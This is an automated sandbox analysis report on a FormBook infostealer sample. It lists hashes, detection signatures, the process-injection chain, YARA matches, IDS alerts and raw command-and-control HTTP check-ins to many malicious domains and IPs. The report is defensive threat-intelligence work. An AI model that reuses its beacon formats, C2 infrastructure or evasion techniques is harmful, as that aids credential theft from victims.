Edit tour

Windows Analysis Report
ncOLm62YLB.exe

Overview

General Information

Sample name:ncOLm62YLB.exe
renamed because original name is a hash value
Original sample name:5e3562a7db4a4a4e1a7735346c32f004de20b841cdbcd06960aa3e7b17798357.exe
Analysis ID:1513892
MD5:ba75f7cc380fdd122467994b56ee9a1c
SHA1:2780a556ceb089824b3cfe22c056fb56798beb9b
SHA256:5e3562a7db4a4a4e1a7735346c32f004de20b841cdbcd06960aa3e7b17798357
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses taskkill to terminate processes
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w7x64
  • ncOLm62YLB.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\ncOLm62YLB.exe" MD5: BA75F7CC380FDD122467994B56EE9A1C)
    • svchost.exe (PID: 3268 cmdline: "C:\Users\user\Desktop\ncOLm62YLB.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)
      • dGGVPduKBhByY.exe (PID: 2632 cmdline: "C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • taskkill.exe (PID: 3396 cmdline: "C:\Windows\SysWOW64\taskkill.exe" MD5: 94BDCAFBD584C979B385ADEE14B08AB4)
          • dGGVPduKBhByY.exe (PID: 2128 cmdline: "C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3596 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.437869561.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.437869561.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2eff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17242:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.437818040.00000000003B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.437818040.00000000003B0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.881475305.0000000000080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\ncOLm62YLB.exe", CommandLine: "C:\Users\user\Desktop\ncOLm62YLB.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ncOLm62YLB.exe", ParentImage: C:\Users\user\Desktop\ncOLm62YLB.exe, ParentProcessId: 3220, ParentProcessName: ncOLm62YLB.exe, ProcessCommandLine: "C:\Users\user\Desktop\ncOLm62YLB.exe", ProcessId: 3268, ProcessName: svchost.exe
        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\taskkill.exe, ProcessId: 3396, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
        Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\ncOLm62YLB.exe", CommandLine: "C:\Users\user\Desktop\ncOLm62YLB.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ncOLm62YLB.exe", ParentImage: C:\Users\user\Desktop\ncOLm62YLB.exe, ParentProcessId: 3220, ParentProcessName: ncOLm62YLB.exe, ProcessCommandLine: "C:\Users\user\Desktop\ncOLm62YLB.exe", ProcessId: 3268, ProcessName: svchost.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-09-19T15:04:08.561475+020020507451Malware Command and Control Activity Detected192.168.2.224916154.179.173.6080TCP
        2024-09-19T15:04:32.628068+020020507451Malware Command and Control Activity Detected192.168.2.2249166206.119.82.14780TCP
        2024-09-19T15:04:45.984393+020020507451Malware Command and Control Activity Detected192.168.2.224917081.88.63.4680TCP
        2024-09-19T15:04:59.431051+020020507451Malware Command and Control Activity Detected192.168.2.224917467.223.117.18980TCP
        2024-09-19T15:05:13.658801+020020507451Malware Command and Control Activity Detected192.168.2.224917885.159.66.9380TCP
        2024-09-19T15:05:27.528121+020020507451Malware Command and Control Activity Detected192.168.2.2249182208.91.197.2780TCP
        2024-09-19T15:06:15.122140+020020507451Malware Command and Control Activity Detected192.168.2.2249186194.58.112.17480TCP
        2024-09-19T15:06:29.007375+020020507451Malware Command and Control Activity Detected192.168.2.2249190103.21.221.480TCP
        2024-09-19T15:06:42.251288+020020507451Malware Command and Control Activity Detected192.168.2.224919484.32.84.3280TCP
        2024-09-19T15:06:55.880336+020020507451Malware Command and Control Activity Detected192.168.2.2249198194.58.112.17480TCP
        2024-09-19T15:07:09.375042+020020507451Malware Command and Control Activity Detected192.168.2.224920265.21.196.9080TCP
        2024-09-19T15:07:22.662612+020020507451Malware Command and Control Activity Detected192.168.2.2249206172.81.61.22480TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://www.tempatmudisini01.click/lybf/Avira URL Cloud: Label: malware
        Source: ncOLm62YLB.exeReversingLabs: Detection: 55%
        Source: Yara matchFile source: 00000002.00000002.437869561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.437818040.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.881475305.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.881601571.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.494804006.0000000000200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.881493642.00000000001B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.881642213.0000000004A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.438755931.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: ncOLm62YLB.exeJoe Sandbox ML: detected
        Source: ncOLm62YLB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dGGVPduKBhByY.exe, 00000003.00000002.881609853.0000000000F3E000.00000002.00000001.01000000.00000004.sdmp, dGGVPduKBhByY.exe, 00000005.00000000.451603298.0000000000F3E000.00000002.00000001.01000000.00000004.sdmp
        Source: Binary string: wntdll.pdb source: ncOLm62YLB.exe, 00000000.00000003.356812562.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, ncOLm62YLB.exe, 00000000.00000003.356393695.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.417591054.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.418903920.0000000000610000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.437933380.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.437933380.0000000000920000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000004.00000002.881754837.0000000002160000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000004.00000003.439122970.0000000001FD0000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000004.00000003.437479142.0000000001DF0000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000004.00000002.881754837.00000000022E0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: taskkill.pdbN source: svchost.exe, 00000002.00000002.437761199.0000000000284000.00000004.00000020.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000003.00000002.881542796.0000000000774000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: svchost.pdb source: taskkill.exe, 00000004.00000002.881622768.0000000000800000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000004.00000002.881943022.0000000002A0C000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000000.451623846.0000000002F6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.495203034.0000000000FCC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: taskkill.pdb source: svchost.exe, 00000002.00000002.437761199.0000000000284000.00000004.00000020.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000003.00000002.881542796.0000000000774000.00000004.00000020.00020000.00000000.sdmp

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49166 -> 206.119.82.147:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49161 -> 54.179.173.60:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49170 -> 81.88.63.46:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49174 -> 67.223.117.189:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49182 -> 208.91.197.27:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49194 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49178 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49202 -> 65.21.196.90:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49190 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49186 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49198 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49206 -> 172.81.61.224:80
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeDNS query: www.uburn.xyz
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeDNS query: www.030003302.xyz
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeDNS query: www.moritynomxd.xyz
        Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
        Source: Joe Sandbox ViewIP Address: 65.21.196.90 65.21.196.90
        Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
        Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
        Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: keep-aliveDate: Thu, 19 Sep 2024 13:04:13 GMTLast-Modified: Tue, 10 Apr 2018 00:29:41 GMTCache-Control: max-age=120ETag: "m5acc0575s6e1ef"Content-type: application/zip; charset=utf-8Content-length: 451055Data Raw: 50 4b 03 04 14 00 00 00 08 00 e5 92 82 4c f7 02 c2 ea df 04 00 00 2f 14 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 9e 12 c2 5a 9d 12 c2 5a 75 78 0b 00 01 04 e8 03 00 00 04 64 00 00 00 85 98 cd 92 dc 28 0c 80 ef 79 9b 64 b6 a6 f6 05 72 de 54 76 0f 7b 73 61 2c bb a9 c1 e0 f0 d3 3d 33 4f bf e2 a7 1b 09 dc d9 d3 8c 3e 19 10 42 12 a2 bf ff fb e3 af 9f ff fc fd c5 ff d2 2a c0 cb 24 b6 cd c1 26 02 4c d2 9a 00 ef e1 54 13 0d e1 31 d8 09 3f 04 e3 95 35 0f 3c 0b f9 16 8f 69 55 46 f9 4b 4f 11 86 9e 1d 62 03 3e 73 55 38 d8 05 0e 30 5b af f0 01 8e c6 94 59 a6 59 db 79 24 af 7f 70 b6 d8 38 6b e0 4c d1 75 2b e8 c7 99 a8 35 27 87 70 62 87 00 ae f3 49 a7 44 09 de 9f 29 0d fe ed 74 16 17 07 c7 21 3b 8b 07 f9 fa 3a b2 de ec ab d0 b1 5b e1 13 9c 1d 7d 75 a7 74 02 14 a7 f9 23 80 e7 48 6a eb 81 23 7b 80 e1 c4 81 58 7a 32 7e 75 73 f8 7f 43 d1 7f 4c 17 61 16 4d 1d 90 60 50 3b d8 d8 7c 20 85 91 a0 9f 85 9f c4 39 36 62 b5 d4 20 5c de 26 06 12 c5 74 1f 59 9a ae df 1a b0 5a 8b 80 f3 4e 06 60 81 e5 a9 82 9c 03 aa e2 6e 78 28 de 19 73 24 85 e3 78 1e 50 15 2e 22 88 59 a0 8d 2c 68 ce 94 e3 84 0b 48 1d 3e 8e 71 58 e5 27 23 78 9e 54 aa 46 b3 78 ae 54 78 66 e2 b9 65 d6 a9 4d 9d 0f 20 aa 71 1c 6e 57 9f bb a2 69 4e 46 d1 44 22 ec e4 cb 13 6f f1 64 92 76 df 55 98 2e d6 be 51 76 28 8d 81 9e c3 63 83 f0 44 13 3d 8b a7 fd d0 10 60 00 cc 2a b3 aa 8d 8a c9 ec 69 99 6b be 34 0d 26 5e 2e d3 35 46 9f 2a e8 e4 9d 8a 65 41 d1 ad d1 c8 b3 e9 ee 7c 9c ed ae 39 99 6c b7 4b 1c 4d 2e 94 7e 9e 82 ba cb 05 dc b0 14 f2 02 ab 8e e4 66 49 94 3b 08 c9 8a ee 66 f1 31 3a 0b c9 1e 03 29 cf 4b 29 5c d6 e8 0f ce b0 82 60 72 ed b0 5b c7 34 3e 88 10 5b 5a a7 7c 12 0e 37 81 41 f8 80 68 45 8a 48 6d c5 72 52 ac aa d6 5f 70 dc 52 36 d7 74 ce 49 bb 30 79 f7 5b 27 12 d7 23 f0 a1 95 4e 78 07 49 84 03 37 8f 4b 20 a0 50 39 12 8a d9 bc f4 d1 b0 f2 5d e1 c0 47 1d a6 a4 6c db 4e ae ce 31 e9 ac 26 d0 08 ad 3e db 1c ab 03 2e 94 54 7d 20 4c 97 5c d1 4b 62 75 f8 3d 05 03 63 dd 60 2c b9 42 a3 79 d2 5e c9 ed 91 9a 0d c5 cd c8 f7 ab 8b 47 5b 41 0b 1f 10 7b 70 61 72 f6 a6 9a 3f b4 9a 71 36 76 5e 0d 61 4f b0 cf 64 2d ad a8 d9 4f 8e 5b db 76 7e bb d0 da ca 4e 24 c5 b4 84 db 24 30 a4 f6 1e 5e d4 76 b9 09 da 29 54 05 2b 2d fb e1 70 bb 6b 93 3d f5 44 8e fd a9 33 22 33 60 3d 48 61 ec f8 0a c2 ac b8 f6 2c 90 04 31 a9 46 f9 b0 37 af b0 16 20 09 24 7a 93 48 d3 df 7a b4 63 a1 22 6b 1d d3 39 67 27 0f b5 e9 70 80 2d 16 f4 32 59 ea 41 e8 7a 04 be f4 f0 e4 3b fe 95 4d 39 40 65 6c 98 bd 1f ba 19 87 b2 dd 0d aa 1a 02 7e 02 55 26 71 f0 a4 fc e0 02 e4 82 c9 d2 b3 8e a8 66 2d eb 4b 08 63 6b 65 da 5d ff 95 62 de 58 77 0a 89 6f 29 9e 58 11 61 1a 63 71 3b e7 aa 60 ed 4c 6a 79 d5 d1 de a3 a1 d1 74 d6 a9 57 d6 77 d5 15 fb 38 b3 7b be 62 d6 25 10 36 6e b2 d0 f9 74 86 af af a3 03 b
        Source: C:\Windows\SysWOW64\taskkill.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3230000[1].zipJump to behavior
        Source: global trafficHTTP traffic detected: GET /pk64/?8Xv=VLHph&00yp=D2L+4j8Jfvzl8MUfQ8Vqcg8UJGxjQORTEOKFuX1NYvsOSSQcePjFSCN0IpBPFQyYTcF2sXIJ5SSoTKuZwczHhXNkHd5+/yEpRQ49c6EBn0Awx4E8u0AdyXPE0U9x HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.tmstore.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
        Source: global trafficHTTP traffic detected: GET /2018/sqlite-dll-win32-x86-3230000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /66vh/?00yp=kbtx4jUoEeJqru/eYT3c5Vhire4uK17S+715NBpuIdmHZ1xIlp9jjMC+TZBsTM0SMZjf/6T4SKfDIcfbQgeQOxE4AwPYeLb9hxh0awV4oFygVNkIao1fnT6jcB2l&8Xv=VLHph HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.wdeb18.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
        Source: global trafficHTTP traffic detected: GET /znmp/?00yp=FLkVAxn7xj4ld/LvMq0K/iiXulx9N79aE0AH2N1ZkKvu5bquFbdTzPdTC48MhLLFLmYJ1R3iNuIMDMPSAaDXGLZVeUFEAGqcz1H7kSUUuWNlK+WvQ97ihpKrgIN8&8Xv=VLHph HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.2bhp.comConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
        Source: global trafficHTTP traffic detected: GET /unks/?00yp=cdhJ2J1BF/3FP1t6JaUpRBiY6vJj+H0GJvy2RzMWe/YhGvvDNzkKCLZa4X+kjjSbzwEwxp7G3rhe+yLW3Nh0WyGxOfs3vMm4SM/FmgEF/5JqIbYW5mmAES/JfVic&8Xv=VLHph HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.uburn.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
        Source: global trafficHTTP traffic detected: GET /og3c/?00yp=PJMN73v+cS+JEOCp4N2ca7oXQDrHb//8AP5dNED26sKmApKDXWDq3GmViPe/3Gp4IvoVz7hFkPBhwTiSMYvo23y1UkhRtLoj8dNpbmj0FYqu8O4HVfsyiW8+Yu10&8Xv=VLHph HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.sppsuperplast.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
        Source: global trafficHTTP traffic detected: GET /c45k/?00yp=08ptcl9k6k3Clc+jjeiigEOOLHF28gEUYr4PirX9ycnlRkqnpIEJw02nTPpiHhV7v0qw4/F1nlB53J+WXC6t4B6EHZ9Land6YOYaCIbjR0qGfJ/yxxEwKy76YPu4&8Xv=VLHph HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.palcoconnector.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
        Source: global trafficHTTP traffic detected: GET /vyk8/?00yp=/8W9lHmy/meYp2fNs2vUBdBvO0RaxjuKL4zSfhQhCqnq6Zc+yf7IonRJTCfzY86I2zYWDYBqoARqKVl9Xke+POkkhC0Ee73KmYZXYdkjDu+t7uIGKB6Jrfbo3k9d&8Xv=VLHph HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
        Source: global trafficHTTP traffic detected: GET /lybf/?8Xv=VLHph&00yp=Y340GT3aYbxxYgEUood/mUhipI1uyVEinTnWDrZvpldzXPMOdnATqmDbf8qtGi1QFPteNGCJ0+TZKIVMINx1OZKHCzmWNMOqHssTi6IKHS9b8ff9oSREka3//nyh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.tempatmudisini01.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
        Source: global trafficHTTP traffic detected: GET /eaxv/?00yp=bH1YG+zUiphgWlE6z5XKm1634D4xd3mXx7VGnNY2K0RSGQ9xBXqow0pPHKhWVXfXj/YC8GTm7XZkAlB3qbMa7XLrOSxMydPR+Fuoje1qC1dI5FzP/s9gH3iBDNgT&8Xv=VLHph HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.glintra.cyouConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
        Source: global trafficHTTP traffic detected: GET /qqaq/?00yp=1v32F+fVawNhWDDVdYvfWdZqxCtuvDWQ4k7tvYXEY8SwEi5Vtj7kNwCwXS/xItGDjN76wG9CW8ocseRH+7QWGn4T5K3waEEqSMTX9Es49Y6frrF6sB7z9p7VlQAX&8Xv=VLHph HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.les-massage.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
        Source: global trafficHTTP traffic detected: GET /vkua/?00yp=H4X0iIfcuDR/51hvqrfWv+fBB4gw1DJH+OHHMfulTPpinGKmiwvV0bR+rgtd9UluzvoyGSPCeaIsA9B2OO6wneeytNJ9oAaYwF4aKTQt7TjjQdxEyAl8xbFhx+zF&8Xv=VLHph HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.030003302.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
        Source: global trafficHTTP traffic detected: GET /1tk5/?00yp=Q0CjUHI68ZrfxR5aH7yI0BUJRaW1qetdZOL/CvAk0p6VOu6F8J4bRF77+lLddJtqRvjzBHuHK195sHOnP/TIC5IkHUm3lhR0HPdJF2NbuGauEJoIrdtAli4Deo9a&8Xv=VLHph HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.moritynomxd.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
        Source: global trafficDNS traffic detected: DNS query: www.tmstore.click
        Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
        Source: global trafficDNS traffic detected: DNS query: www.wdeb18.top
        Source: global trafficDNS traffic detected: DNS query: www.2bhp.com
        Source: global trafficDNS traffic detected: DNS query: www.uburn.xyz
        Source: global trafficDNS traffic detected: DNS query: www.sppsuperplast.online
        Source: global trafficDNS traffic detected: DNS query: www.palcoconnector.net
        Source: global trafficDNS traffic detected: DNS query: www.trapkitten.website
        Source: global trafficDNS traffic detected: DNS query: www.albero-dveri.online
        Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini01.click
        Source: global trafficDNS traffic detected: DNS query: www.glintra.cyou
        Source: global trafficDNS traffic detected: DNS query: www.les-massage.online
        Source: global trafficDNS traffic detected: DNS query: www.030003302.xyz
        Source: global trafficDNS traffic detected: DNS query: www.moritynomxd.xyz
